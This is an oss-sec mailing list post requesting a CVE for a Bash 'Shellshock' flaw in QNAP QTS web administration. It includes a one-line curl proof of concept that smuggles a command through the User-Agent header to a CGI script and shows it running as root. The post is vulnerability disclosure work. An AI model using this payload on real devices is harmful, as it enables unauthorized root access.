oss-sec mailing list archives
CVE request: QNAP QTS
From: Ken Lee <echain.tw () gmail com>
Date: Mon, 29 Sep 2014 09:49:42 +0800
Hello, QNAP QTS [1] employ Bash as the default shell and we discover an arbitrary code execution flaw with UID=0 via `Web administration'. The PoC is shown as below:
$ curl -A '() { :;}; echo Content-Type: text/html; echo; echo `/usr/bin/id`' http://QNAP_QTS:8080/cgi-bin/restore_config.cgi *uid=0(admin) gid=0(administrators)* HTTP/1.1 200 OK
{ "authPassed": 1, "Result": 0 } This issue has been acknowledged [2] by QNAP and if not assigned yet, please help to arrange a CVE identifier for this issue. Thank you, and have a nice day. Reference: [1] http://www.qnap.com.tw/i/en/qts4 [2] http://www.qnap.com/useng/index.php?lang=en-us&sn=885&c=3036&sc=&n=22457
Current thread:
- CVE request: QNAP QTS Ken Lee (Sep 28)
- Re: CVE request: QNAP QTS cve-assign (Sep 29)